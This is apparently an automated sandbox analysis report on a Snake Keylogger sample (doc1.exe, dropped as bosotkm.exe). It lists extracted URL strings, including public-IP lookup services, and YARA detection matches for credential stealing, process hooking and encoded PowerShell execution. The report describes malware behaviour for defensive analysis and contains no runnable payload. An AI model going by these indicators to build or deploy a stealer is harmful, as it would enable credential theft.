                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: svchost.exe, 00000035.00000002.3463466912.000001E75A800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: qmgr.db.53.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329661615.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2326342412.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328065250.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microso
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: qmgr.db.53.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                  Source: svchost.exe, 00000035.00000003.3336685881.000001E75A600000.00000004.00000800.00020000.00000000.sdmp, edb.log.53.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: doc1.exe, bosotkm.exe.1.dr; String found in binary or memory: https://www.globalsign.com/repository/0
                  Source: unknown; HTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.6:49735 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.6:49738 version: TLS 1.2

                  System Summary

                  Source: amsi64_3508.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                  Source: amsi64_2188.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                  Source: amsi64_6756.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                  Source: amsi64_2548.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                  Source: amsi64_2744.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                  Source: amsi64_4568.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 0000001A.00000002.3442953774.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTR; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR; Matched rule: Detects Snake Keylogger; Author: ditekSHen
                  Source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                  Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
                  Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
                  Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
